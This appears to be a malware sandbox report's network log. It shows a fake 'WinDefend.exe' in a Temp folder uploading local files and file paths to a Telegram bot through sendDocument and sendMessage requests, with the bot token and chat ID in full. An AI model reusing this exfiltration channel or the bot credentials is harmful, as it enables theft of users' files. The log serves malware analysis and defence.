2f 16 36 7b fa 57 10 51 a4 06 c3 b6 c6 52 73 ae 57 01 80 Data Ascii: e/VYH/&`2d[cfTk~%z7E+:rj]mmf6[6vNYKo+QluRpUoU[ZZ8~.O:??_p]D9s[P*a&iqiqaCaKNb%GRFDw3P:h}}1~ssMCb%B?~{@I\U7Gw0)/6{WQRsW
2024-05-23 13:35:22 UTC	4096	OUT	Data Raw: 5a d7 8d d6 e3 2d 1e 8f b3 89 ae e2 5f cb e1 b0 b3 c9 bc cc 3f 52 55 35 12 89 d4 fa 5e 5f 00 00 e6 42 b0 ad 49 69 9a b2 b4 b4 bc b2 d2 d4 24 65 a6 0e db 95 51 72 49 ab b1 d5 78 3c 1e 5b 5b e3 ed 5b 00 00 20 00 49 44 41 54 8d 6d b7 78 d2 22 8a 0e 87 c3 66 b7 65 9d 4b d3 52 da f2 ca f2 ca f2 4a d5 2e 15 07 00 a8 15 08 b6 0d 54 55 9d 9f bf b7 d9 38 21 c7 73 ac 03 47 4d 94 4c e8 ff 97 cc ba b5 07 db 65 df 22 8a a2 45 b4 5a ad 39 f6 29 36 7d 99 01 00 40 3d 41 b0 65 11 8f c7 e7 e7 e3 b9 f7 fe 10 2d a2 68 11 29 fb 92 b3 7c a1 e8 11 00 a0 e4 b0 2d ec a6 e2 f1 f8 bd 85 85 99 99 d9 48 24 52 da ec d1 52 5a 24 12 b9 fb f1 dd 4a 2e 2a 00 30 57 30 18 3a 72 e4 e8 91 23 47 cd 6e 08 d4 3f 04 db 16 54 55 8d 44 96 67 66 66 e7 66 e7 56 96 57 8a cc a1 d8 6a 6c e1 de c2 c7 77 Data Ascii: Z-_?RU5^_BIi$eQrIx<[[[ IDATmx"feKRJ.TU8!sGMLe"EZ9)6}@=Ae-h)\|-H$RRZ$J.*0W0:r#Gn?TUDgfffVWjlw
2024-05-23 13:35:22 UTC	4096	OUT	Data Raw: 6b e8 6f bb 6f df c8 e7 f3 b3 b7 df d9 99 a5 83 e8 f5 76 b0 52 c6 ed 0e 6f b2 da 93 40 60 22 ed 89 7e bf 9f 36 5f 74 0f 35 04 c1 06 50 5e 7a 97 6b 64 e4 82 9e 16 b9 3b 3d 92 24 b1 6e 99 5e 98 4e 44 6e b7 9b cd ba 8d 8c 5c d0 8b d7 15 45 09 04 26 72 0c 2d b2 57 1f 1f bf 5f ec 9e 4f 7f 2b 1c 9e 3a 7e fc b9 91 91 0b ec e0 c1 60 c8 e7 f3 f7 f7 bf 4c db 3f ef 17 f0 f6 59 03 86 86 ce b1 ae 5e 4f cf fd e5 e4 a7 4f 9f d1 97 66 2b 8a c2 ca 40 b6 3b 0e a9 d7 70 ea 47 53 14 85 2d a5 20 22 56 b1 99 46 7f d8 b6 5e 08 cc 82 a1 48 80 f2 62 4b 8c 59 1a e9 6b a4 b6 c4 96 58 f5 f7 9f 94 65 99 8d 49 b2 e3 b0 fa 0b 56 3a a1 3f d8 58 4c 9f 66 60 60 a0 bf ff 64 30 18 3a 7e fc b9 6d 35 9b 9d eb 33 df 8b 71 93 ad 7c 6c f7 ed a7 0d 93 a6 2d ac 0e 04 26 02 81 89 d3 a7 37 3c a5 b7 Data Ascii: koovRo@`"~6_t5P^zkd;=$n^NDn\E&r-W_O+:~`L?Y^OOf+@;pGS- "VF^HbKYkXeIV:?XLf``d0:~m53q\|l-&7<
2024-05-23 13:35:22 UTC	3492	OUT	Data Raw: 14 09 25 62 11 45 f6 4f 89 e3 f1 1b 95 8b 18 8f c7 cd 6e 03 ec 00 b1 58 24 b2 dc e0 70 34 3a 1b cc 6e 4a 25 a8 c9 64 22 91 e0 79 21 a5 69 08 36 28 15 76 ba 8e 08 cb bb 9a 9b 45 0b 26 92 36 85 a1 48 a8 9c e5 95 95 48 c4 9c 4b 9b ff 29 00 00 0d 3e 49 44 41 54 9a 11 80 ba a1 aa ea fc fc bc 96 c2 40 f7 a6 10 6c 50 51 2b cb f5 3c b5 76 1f ca 45 a0 9c 52 9a 16 8d 16 75 59 8c fa 86 60 83 8a 4a 69 5a 32 99 ac ff a1 39 8e 23 2c 5f 83 72 5a 8d c5 cc 6e 42 f5 42 b0 41 a5 69 9a c6 ce fa 66 37 a4 8c 0e 3e f2 28 cf f3 c4 51 7d bf 4d 80 ea 84 60 83 8a e2 38 4e e0 05 8e e7 0e b7 3d 6e 76 5b ca 88 17 78 8e e3 eb 3c bd c1 54 3c 7e b9 36 87 60 83 8a 12 05 41 b4 5a 78 9e e7 b9 ba fd dd 6b dd bb 9f e3 78 8e e7 38 8e 27 42 a7 0d ca c2 66 b7 99 dd 84 ea 55 b7 27 17 a8 42 1c c7 Data Ascii: %bEOnX$p4:nJ%d"y!i6(vE&6HHK)>IDAT@lPQ+<vERuY`JiZ29#,_rZnBBAif7>(Q}M`8N=nv[x<T<~6`AZxkx8'BfU'B
2024-05-23 13:35:22 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 33 65 39 36 31 61 36 65 2d 30 61 34 30 2d 34 34 61 62 2d 38 30 38 30 2d 62 31 39 35 39 30 36 36 65 36 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --3e961a6e-0a40-44ab-8080-b1959066e660Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:22 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:22 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 33 65 39 36 31 61 36 65 2d 30 61 34 30 2d 34 34 61 62 2d 38 30 38 30 2d 62 31 39 35 39 30 36 36 65 36 36 30 2d 2d 0d 0a Data Ascii: --3e961a6e-0a40-44ab-8080-b1959066e660--
2024-05-23 13:35:22 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:22 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
163	192.168.2.5	61211	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:21 UTC	232	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="5211d5fe-f499-4ae2-9bf7-44e5fd05c9d5" Host: api.telegram.org Content-Length: 858 Expect: 100-continue
2024-05-23 13:35:22 UTC	40	OUT	Data Raw: 2d 2d 35 32 31 31 64 35 66 65 2d 66 34 39 39 2d 34 61 65 32 2d 39 62 66 37 2d 34 34 65 35 66 64 30 35 63 39 64 35 0d 0a Data Ascii: --5211d5fe-f499-4ae2-9bf7-44e5fd05c9d5
2024-05-23 13:35:22 UTC	109	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 53 65 61 72 63 68 45 6d 61 69 6c 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 53 65 61 72 63 68 45 6d 61 69 6c 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=SearchEmail.png; filename*=utf-8''SearchEmail.png
2024-05-23 13:35:22 UTC	524	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 10 08 06 00 00 01 68 f4 cf f7 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 01 c3 49 44 41 54 38 11 9d 53 3b 4b 03 41 10 be 47 8a 10 3c 10 45 04 0b 15 c4 e2 9a 34 77 89 6d 0a 6b 2b d1 42 d3 d8 59 0a 1a 9b 88 11 6d 44 0b 7f 41 d4 4e fd 09 6a 61 6b ee 55 1d 49 6b 2b a8 48 b8 58 5c ee ce 6f 36 d9 65 91 58 e8 c2 de 3c be 6f 67 66 67 f6 14 05 2b 08 82 f9 c1 47 58 a4 d0 72 5d 77 56 f1 7d 7f 6e 60 2a a4 cf a8 02 81 92 a6 e9 0b 03 1d c7 a9 71 96 02 e3 94 0c 2e 35 81 c8 4a ab d5 da e5 36 0b 0a 47 a0 aa ea bd 61 18 27 dd 6e b7 0e 70 a5 54 2a 99 8c 84 58 7b 61 18 8e f1 13 24 3b 9d 8e 01 ff 0e e9 2c 02 0c 1f fa 43 a1 50 38 ee f5 7a 07 59 96 d5 ca e5 32 c3 88 f4 eb 42 ea 4c 80 9e e7 ad 61 6f Data Ascii: PNGIHDRhgAMAaIDAT8S;KAG<E4wmk+BYmDANjakUIk+HX\o6eX<ogfg+GXr]wV}n`q.5J6Ga'npTX{a$;,CP8zY2BLao
2024-05-23 13:35:22 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 35 32 31 31 64 35 66 65 2d 66 34 39 39 2d 34 61 65 32 2d 39 62 66 37 2d 34 34 65 35 66 64 30 35 63 39 64 35 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --5211d5fe-f499-4ae2-9bf7-44e5fd05c9d5Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:22 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:22 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 35 32 31 31 64 35 66 65 2d 66 34 39 39 2d 34 61 65 32 2d 39 62 66 37 2d 34 34 65 35 66 64 30 35 63 39 64 35 2d 2d 0d 0a Data Ascii: --5211d5fe-f499-4ae2-9bf7-44e5fd05c9d5--
2024-05-23 13:35:22 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:22 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:22 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
164	192.168.2.5	61212	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:22 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="3c709e0c-c3a8-4ede-b2d1-29b411f16e03" Host: api.telegram.org Content-Length: 2163 Expect: 100-continue
2024-05-23 13:35:23 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:23 UTC	40	OUT	Data Raw: 2d 2d 33 63 37 30 39 65 30 63 2d 63 33 61 38 2d 34 65 64 65 2d 62 32 64 31 2d 32 39 62 34 31 31 66 31 36 65 30 33 0d 0a Data Ascii: --3c709e0c-c3a8-4ede-b2d1-29b411f16e03
2024-05-23 13:35:23 UTC	91	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 39 36 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 39 36 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=96.png; filename*=utf-8''96.png
2024-05-23 13:35:23 UTC	1847	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 60 00 00 00 60 08 06 00 00 00 e2 98 77 38 00 00 06 fe 49 44 41 54 78 9c ed 9d 5f 88 24 47 1d c7 bf df aa 9e 9e d9 9d 9b bd 33 ee a2 1e 88 22 17 0e ce 3f 44 41 45 82 70 20 1c 26 0f 11 a3 7b 20 3e 88 c4 27 1f 92 3c 46 44 19 e3 c3 f9 a6 11 c4 47 21 18 82 97 7d 49 c0 04 f2 74 a0 70 81 bc 04 1f 4e 23 41 09 89 89 f1 2e 39 2f b3 b3 bb d3 33 5d 5f 1f a6 7b 76 ee bc db 9b 99 ee eb ea cc d6 07 7a 60 67 a7 7e fd ab fa d6 af 7e d5 35 d5 d3 40 20 10 28 8b f3 9b d6 b7 0b 07 40 df 0e dc 8c 72 9c 12 08 42 f9 9f 9f fc dd e9 56 d3 ad 35 26 ff 5f 2f e5 2c f3 73 25 3b f7 15 e0 d5 87 9e eb 61 5c 5f 1d 5c a8 5a ca eb 15 dd d3 d1 17 3e bd fe 10 c9 6f 62 98 9e 84 c1 31 8a 14 00 ca 4f ef 13 25 92 72 82 f9 d7 df df 3a f7 ce Data Ascii: PNGIHDR``w8IDATx_$G3"?DAEp &{ >'<FDG!}ItpN#A.9/3]_{vz`g~~5@ (@rBV5&_/,s%;a\_\Z>ob1O%r:
2024-05-23 13:35:23 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 33 63 37 30 39 65 30 63 2d 63 33 61 38 2d 34 65 64 65 2d 62 32 64 31 2d 32 39 62 34 31 31 66 31 36 65 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --3c709e0c-c3a8-4ede-b2d1-29b411f16e03Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:23 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:23 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 33 63 37 30 39 65 30 63 2d 63 33 61 38 2d 34 65 64 65 2d 62 32 64 31 2d 32 39 62 34 31 31 66 31 36 65 30 33 2d 2d 0d 0a Data Ascii: --3c709e0c-c3a8-4ede-b2d1-29b411f16e03--
2024-05-23 13:35:23 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:23 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
165	192.168.2.5	61213	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:23 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 258 Expect: 100-continue
2024-05-23 13:35:23 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:23 UTC	258	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 35 37 36 38 36 63 30 65 33 32 65 31 39 38 33 64 35 32 34 66 62 36 66 38 64 34 36 63 61 38 63 37 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 61 70 70 31 25 35 43 64 63 2d 64 65 73 6b 74 6f 70 2d 61 70 70 2d 64 72 6f 70 69 6e 25 35 43 31 2e 30 2e 30 5f 31 2e 30 2e 30 25 35 43 35 37 36 38 36 63 30 65 33 32 65 31 39 38 33 64 35 32 34 66 62 36 66 38 64 34 36 63 61 38 63 37 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 32 36 33 Data Ascii: chat_id=1655240967&text=File%3A+57686c0e32e1983d524fb6f8d46ca8c7.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Capp1%5Cdc-desktop-app-dropin%5C1.0.0_1.0.0%5C57686c0e32e1983d524fb6f8d46ca8c7.png%0ASize%3A+263
2024-05-23 13:35:23 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:23 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
166	192.168.2.5	61214	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:23 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 191 Expect: 100-continue
2024-05-23 13:35:23 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:23 UTC	191	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 53 65 61 72 63 68 45 6d 61 69 6c 32 78 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 53 65 61 72 63 68 45 6d 61 69 6c 32 78 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 31 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+SearchEmail2x.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5CSearchEmail2x.png%0ASize%3A+1+KB
2024-05-23 13:35:24 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:23 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
167	192.168.2.5	61215	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:24 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 349 Expect: 100-continue
2024-05-23 13:35:24 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:24 UTC	349	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 31 32 38 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 Data Ascii: chat_id=1655240967&text=File%3A+128.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applica
2024-05-23 13:35:24 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:24 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
168	192.168.2.5	61216	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:24 UTC	235	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="a76cf6c6-e263-40cf-9519-6a32bd4875cd" Host: api.telegram.org Content-Length: 270320 Expect: 100-continue
2024-05-23 13:35:24 UTC	40	OUT	Data Raw: 2d 2d 61 37 36 63 66 36 63 36 2d 65 32 36 33 2d 34 30 63 66 2d 39 35 31 39 2d 36 61 33 32 62 64 34 38 37 35 63 64 0d 0a Data Ascii: --a76cf6c6-e263-40cf-9519-6a32bd4875cd
2024-05-23 13:35:24 UTC	151	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 35 37 36 38 36 63 30 65 33 32 65 31 39 38 33 64 35 32 34 66 62 36 66 38 64 34 36 63 61 38 63 37 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 35 37 36 38 36 63 30 65 33 32 65 31 39 38 33 64 35 32 34 66 62 36 66 38 64 34 36 63 61 38 63 37 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=57686c0e32e1983d524fb6f8d46ca8c7.png; filename*=utf-8''57686c0e32e1983d524fb6f8d46ca8c7.png
2024-05-23 13:35:24 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 da 00 00 05 54 08 02 00 00 00 42 b0 af 06 00 00 80 00 49 44 41 54 78 da ec dd 09 57 14 d7 ba ff f1 fb 26 fe af ea 2c 93 76 8a c6 18 63 4c 88 9a e8 f5 18 39 6a 8c 51 8f 53 9c 13 67 71 1e 70 88 43 90 38 05 e1 c4 11 67 1c 20 22 10 05 07 14 50 44 66 21 18 fd 3f 97 e7 66 df 4d 55 77 51 3d 52 0d df cf ea e5 92 a2 ba ba 6a ef aa a2 76 fd 7a ef fa af f5 6b d7 f2 e2 c5 8b 17 2f 5e bc 78 f1 e2 c5 8b 17 2f 5e bc 78 f1 e2 c5 8b 17 2f 5e bc 78 f1 e2 c5 8b 17 af 84 bf fe 8b 22 e0 c5 8b 17 2f 5e bc 78 f1 e2 c5 8b 17 2f 5e bc 78 f1 e2 c5 8b 17 2f 5e bc 78 f1 e2 c5 8b 17 af 24 c6 b1 c5 c5 c5 d7 01 00 00 00 00 00 00 00 00 00 00 89 d0 23 8e bd 75 eb 16 25 02 00 00 00 00 00 00 00 00 00 00 09 d1 23 8e dd 36 be 72 cd 07 Data Ascii: PNGIHDRTBIDATxW&,vcL9jQSgqpC8g "PDf!?fMUwQ=Rjvzk/^x/^x/^x"/^x/^x/^x$#u%#6r
2024-05-23 13:35:24 UTC	4096	OUT	Data Raw: e7 9f 7f 76 77 cc dd b4 69 53 d8 87 bf 7e fa e9 a7 4b 96 2c 39 79 f2 e4 f3 e7 cf ed 85 6c d9 b2 c5 31 52 b1 83 fd db cc cc cc d4 97 b0 54 ab 7c b4 54 71 a2 f6 96 3e eb 1d eb 7e 4d cc c8 70 3f f7 d4 1d 31 86 7d 99 78 cc 9e df 23 4e 8b 3f 59 8c 76 c5 ec 27 e3 9a 61 72 c3 f6 5e 8d 2d 8e 55 52 80 ee 6e b2 7e 62 69 8f c1 8a cd 02 1d 41 69 57 1c 71 ac ac d2 96 ac ac b0 65 d8 b7 71 6c b4 d5 1a 55 cd 02 00 00 c0 8f d7 af 5f 57 55 55 5d ed 26 ff 69 6f 6f 0f e6 7a 36 34 34 d4 d7 d7 53 5f 14 2c 38 53 05 f9 4c 05 00 00 80 e4 d1 07 a6 16 14 14 a4 3e 2c 5c b4 68 91 1d 58 9e 3d 7b d6 3b 79 5d 67 79 f6 ec 59 a4 38 b6 b3 b3 73 c4 88 11 66 a2 6c a0 7b 69 17 2f 5e b4 df 78 e5 ca 15 99 d8 d4 d4 e4 78 9c ad c3 f0 e1 c3 37 6f de 6c 7a c7 7e f7 dd 77 21 df be f8 e2 8b d4 97 b0 Data Ascii: vwiS~K,9yl1RT\|Tq>~Mp?1}x#N?Yv'ar^-URn~biAiWqeqlU_WUU]&iooz644S_,8SL>,\hX={;y]gyY8sfl{i/^xx7olz~w!
2024-05-23 13:35:24 UTC	4096	OUT	Data Raw: 71 1d f3 1e 68 0e 76 ed b6 6e 68 0a f8 f3 cf 3f fb 3f b1 68 1e 2c 1f 67 be 41 a2 96 2d 5b e6 11 c7 2a f7 b3 63 35 8e d5 4e de 26 c6 f6 73 c0 ca 35 98 fc 28 d7 63 0f 1e 3c 30 f3 b4 b6 b6 6a 78 bc 6d db 36 c7 99 41 1f 51 a6 df 6f 90 b3 bd 47 85 fa fc 9b 12 f6 e4 39 61 c2 04 cd 9b ed 8f 78 f2 e4 89 5e 49 4a 49 ca 8f e7 ce 9d d3 0e c7 4f 9f 3e fd bf 3b 57 2d 2d ba e6 71 9e 9c 7b 3d d5 70 79 06 00 40 0a ec d8 b1 43 2e 3c 56 ac 58 f1 67 df 91 26 d8 37 df 7c 13 36 94 95 3f fa 37 6f de 74 bf e5 c4 89 13 f6 6c 72 d9 e0 98 41 2e ae 16 2f 5e 2c d7 63 f6 6c f2 11 b2 c0 1b 37 6e b8 17 28 57 4d 72 f1 19 b6 b7 ee a7 9f 7e 2a 6d db 17 2f 5e b8 df 25 8d 44 b9 60 1b 3d 7a b4 3b bb 3d 75 ea 54 ea b3 58 21 55 29 2b 20 d5 9a d8 fd a4 67 1c fb c5 fd 3e 8c 63 bb 7a c6 81 76 94 Data Ascii: qhvnh??h,gA-[c5N&s5(c<0jxm6AQoG9ax^IJIO>;W--q{=py@C.<VXg&7\|6?7otlrA./^,cl7n(WMr~m/^%D`=z;=uTX!U)+ g>czv
